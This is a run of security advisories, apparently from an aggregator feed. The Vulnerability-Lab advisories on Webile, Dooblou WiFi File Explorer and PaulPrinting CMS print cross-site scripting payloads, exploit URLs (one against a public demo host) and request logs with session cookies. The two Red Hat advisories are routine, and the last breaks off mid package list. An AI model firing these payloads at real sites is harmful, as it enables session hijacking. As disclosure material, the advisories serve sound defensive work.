and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Parameter(s):[+] new_file_name[+] iProof of Concept (PoC):=======================The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Vulnerable Source: SendSend message to phone listing<div class="layui-colla-item"><div class="layui-card-header">Message</div><div class="layui-colla-content" style="display:block;padding-left:16px;"><div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"  title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br><span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div></div></div></div>history logs messages<table class="layui-table layui-form"><thead><tr><th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"><input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th><th style="border-right-width:1px;">Message</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr></thead><tbody><tr><td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"><input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></td><td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td><td align="center">2022/07/17 20:10</td><td class="td-manage" style="border-right-width:1px;text-align:center;"><a title="Copy" onclick="copy(3)" href="javascript:;"><i class="iconfont">&nbsp;&nbsp;</i></a><a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"><i class="layui-icon">&nbsp;&nbsp;</i></a></td></tr></tbody></table>--- PoC Session Logs #1 (POST) ---  (Add)http://localhost:8080/file_actionHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 210Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 0-Cookie:treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6--- PoC Session Logs #2 (POST) ---  (Send)http://localhost:8080/sendHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 180Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamDate: Sun, 17 Jul 2022 18:08:33 GMTConnection: keep-aliveContent-Length: 0Security Risk:==============The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Cross Site Scripting

Dooblou WiFi File Explorer version 1.13.3 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Dooblou WiFi File Explorer 1.13.3 - Multiple VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2317Release Date:=============2023-07-04Vulnerability Laboratory ID (VL-ID):====================================2317Common Vulnerability Scoring System:====================================5.1Vulnerability Class:====================MultipleCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.Affected Product(s):====================Product Owner: dooblouProduct: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)Vulnerability Disclosure Timeline:==================================2022-01-19: Researcher Notification & Coordination (Security Researcher)2022-01-20: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-04: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-applicationrequests from the application-side.The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validatedand executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized toperform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of thefront- & backend of the wifi explorer.Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicioussource and non-persistent manipulation of affected application modules.Proof of Concept (PoC):=======================The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEXVulnerable Sources: Execution Points<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><tdstyle="vertical-align:top;"><table style="background-color: #FFA81E;background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" width="700"cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><spanclass="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><table style="background-color: #B2B2B2; background-image:url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><span class="doob_medium_text">Cannot find file ordirectory! /storage/emulated/0/Download/<a href="https://evil.source"  onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURNINDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<ahref="/">>>&nbsp;Back ToFiles&nbsp;>></a></span></span><br></td></tr></tbody></table><br>-<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I-<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source"  onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are  you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action','13&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy","/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source"  onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>---PoC Session Logs ---http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xml-http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0Upgrade-Insecure-Requests: 1GET: HTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html-http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source"  onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xmlSecurity Risk:==============The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Dooblou WiFi File Explorer 1.13.3 Cross Site Scripting

Red Hat Security Advisory 2023-4204-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. After deploying the VolSync operator, it can create and maintain copies of your persistent data.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: VolSync 0.7.3 security fixes and enhancements  
Advisory ID:       RHSA-2023:4204-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4204  
Issue date:        2023-07-18  
CVE Names:         CVE-2020-24736 CVE-2023-1667 CVE-2023-2283   
                   CVE-2023-3089 CVE-2023-24329 CVE-2023-26604   
=====================================================================

1. Summary:

VolSync v0.7.3 enhancements and security fixes

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8/html/business_continuity/business-cont-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync  
container images.

Security fix(es):  
* CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

For details on how to install VolSync, refer to:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8/html/business_continuity/business-cont-overview#volsync-rep

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

ACM-6336 - VolSync v0.7.3

6. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkt2keAAoJENzjgjWX9erEKL0P/24na+zumgR7Ee/Y9VksDnX9  
7TNKrwdNj4sRsOh8+QVWpcHInG/uLi3lWt7n1Xp6mOx6lG/DoO9AmiqiKFDMgCt+  
kP8aakLQ+bKM/VdibJSBrB1wu+3DAJWVy7+bw2V+ivw72vBoIoz0wB5zn6Pz8SXG  
I2/oWUTJM5L3p4Vk/s7mFyyp/JDbElTsZLTDPWG28Yh9YTlZoLVznymbNjlUZwj4  
8zS7+EMRwje7dQKnMBOWnJvCN/wASSkBsUxZVFRYIpNYdSUSoT42sPlcoqE0dGue  
nINsyBDZv7TNz/abUSO35gVCNwZZj0DLZ+thktzrHl6AYWKr7W5v6NhBEtG2quFL  
74q4Apg3x/rl9421SOMdrgOvW/MWDA1foFNP/5K5fCWxBq30QSvCpgRKpIpAZ0er  
rJOVLNbin+gphFd52mJV7dJo2BK6EzIoIv7Plgurdhyl2sugYVDEmxUotWF844eX  
En3O2Ho/TtSDuR9CGY7wA2oxB8aPUOdbsCnKLISIl+s+uaw/2GeIMvx/MD9cepVs  
aLOy+unl67NzNW7mpMcvrsEJi/mxp6hRVQwVy95LSMqw0mRxHOFOC31qZ2rD5h4L  
GR7j0X7KKX7pbCZwhNFPw+WoQRlZL1aqK3GfV8lMZOLqSpaY7qWBfWe9DIik/gEO  
o9BxEjx9kmvJ+ImLK1j/  
=137U  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4204-01

PaulPrinting CMS suffers from a cross site scripting vulnerability.

Document Title:  
===============  
PaulPrinting CMS - (Search Delivery) Cross Site Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2286

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2286

Common Vulnerability Scoring System:  
====================================  
5.2

Vulnerability Class:  
====================  
Cross Site Scripting - Non Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.

Vulnerability Disclosure Timeline:  
==================================  
2022-08-25: Researcher Notification & Coordination (Security Researcher)  
2022-08-26: Vendor Notification (Security Department)  
2022-**-**: Vendor Response/Feedback (Security Department)  
2022-**-**: Vendor Fix/Patch (Service Developer Team)  
2022-**-**: Security Acknowledgements (Security Department)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Medium User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.  
Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter  
affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side  
script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects  
to malicious source and non-persistent manipulation of affected application modules.

Request Method(s):  
[+] GET

Vulnerable Module(s):  
[+] /account/delivery

Vulnerable Input(s):  
[+] Search

Vulnerable Parameter(s):  
[+] q

Affected Module(s):  
[+] /account/delivery  
[+] Delivery Contacts

Proof of Concept (PoC):  
=======================  
The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example  
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>

--- PoC Session Logs (GET) ---  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>  
Host: codeawesome.in  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Connection: keep-alive  
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;  
-  
GET: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33

Vulnerable Source:  (Search - delivery?q=)  
<div class="col-lg-8">  
<a href="https://codeawesome.in/printing/account/delivery"  class="btn btn-primary mt-4 mb-2 float-right">  
<i class="fa fa-fw fa-plus"></i>  
</a>  
<form class="form-inline mt-4 mb-2" method="get">  
<div class="input-group mb-3 mr-2">  
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">  
<div class="input-group-append">  
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>  
</div></div>

Security Risk:  
==============  
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Red Hat Security Advisory 2023-4201-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:4201-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4201  
Issue date:        2023-07-18  
CVE Names:         CVE-2023-32435 CVE-2023-32439   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-32435)

* webkitgtk: type confusion issue leading to arbitrary code execution  
(CVE-2023-32439)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2218626 - CVE-2023-32435 webkitgtk: memory corruption issue leading to arbitrary code execution  
2218640 - CVE-2023-32439 webkitgtk: type confusion issue leading to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.38.5-1.el9_2.3.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el9_2.3.ppc64le.rpm  
